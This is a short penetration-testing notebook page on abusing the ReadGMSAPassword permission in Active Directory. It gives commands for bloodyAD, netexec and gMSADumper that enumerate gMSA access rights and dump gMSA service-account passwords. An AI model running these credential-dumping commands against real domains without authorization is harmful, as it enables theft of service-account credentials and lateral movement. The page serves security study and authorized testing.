READGMSAPASSWORD

PRIMARY CATEGORY → DACL ABUSE

Theory

GMSA → Group Managed Service Accounts

This solution would be to service accounts what LAPS is to local administrator accounts of domain-joined machines

It periodically generates random and complex passwords for the domain service accounts and stores them in the DC

A domain account can retrieve the password for a gMSA if it has the appropiated permissions over the latter, which can be known by listing its msDS-GroupMSAMembership attribute, whose value it’s a Security Descriptor

Enumeration - UNIX-like

BloodyAD.py

BloodyAD.py

Setup

git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER' --password '<PASSWD>' --dc-ip '<DC_IP>' get object '<TARGET_SERVICE_ACCOUNT>' --attr 'msDS-GroupMSAMembership' --resolve-sd

Abuse - UNIX-like

Netexec

Netexec

nxc ldap <TARGET> --username '<USER>' --password '<PASSWD>' --gmsa

gMSADumper.py

gMSADumper.py

Setup

git clone https://github.com/micahvandeusen/gMSADumper gMSADumper
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 gMSADumper.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>'

Resources

The Hacker Recipes: Read gMSA Password

💥Cyb3rBook

Explorer

READGMSAPASSWORD

PRIMARY CATEGORY → DACL ABUSE

Theory

Enumeration - UNIX-like

BloodyAD.py

Setup

Usage

Abuse - UNIX-like

Netexec

gMSADumper.py

Setup

Usage

Resources

Graph View

Table of Contents

Backlinks